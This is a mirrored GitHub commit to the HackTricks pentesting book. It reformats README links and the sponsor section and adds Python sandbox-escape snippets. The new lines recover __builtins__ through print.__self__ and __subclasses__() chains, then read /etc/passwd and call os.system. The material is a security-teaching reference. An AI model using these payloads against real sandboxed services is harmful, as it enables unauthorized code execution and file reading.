mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GitBook: [master] 517 pages modified
This commit is contained in:
parent
14ead4a692
commit
8625431ec6
2 changed files with 23 additions and 11 deletions
18
README.md
18
README.md
|
@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting
|
|||
|
||||
**Click in the title to start!**
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book.
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm).
|
||||
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
|
||||
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
|
||||
|
||||
{% hint style="danger" %}
|
||||
|
@ -32,17 +32,15 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
|
|||
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
## Corporate Sponsors
|
||||
|
||||
### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\*
|
||||
### [**INE**](https://ine.com/)
|
||||
|
||||
![](.gitbook/assets/ine_logo-3-.jpg)
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
|
||||
|
||||
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
|
||||
[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
|
||||
|
||||
#### **Courses and Certifications reviews**
|
||||
|
||||
|
@ -50,7 +48,9 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
|
|||
|
||||
{% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
|
||||
|
||||
\*\*\*\*
|
||||
|
||||
|
||||
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
|
||||
|
||||
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
|
||||
|
||||
|
|
|
@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
|
|||
#### Python3
|
||||
|
||||
```python
|
||||
# Obtain the builtins from a defined function
|
||||
get_flag.__globals__['__builtins__'].__import__("os").system("ls")
|
||||
# Obtain builtins from a globally defined function
|
||||
print.__self__
|
||||
dir.__self__
|
||||
globals.__self__
|
||||
|
||||
# Obtain the builtins from a defined function
|
||||
get_flag.__globals__['__builtins__']
|
||||
|
||||
# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
|
||||
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
|
||||
|
@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
|
|||
__builtins__["__import__"]('os').system('ls')
|
||||
```
|
||||
|
||||
### Builtins payloads
|
||||
|
||||
```python
|
||||
# Possible payloads once you have found the builtins
|
||||
.open("/etc/passwd").read()
|
||||
.__import__("os").system("ls")
|
||||
```
|
||||
|
||||
### Discovering loaded variables
|
||||
|
||||
Checking the **`globals`** and **`locals`** is a good way to know what you can access.
|
||||
|
|
Loading…
Reference in a new issue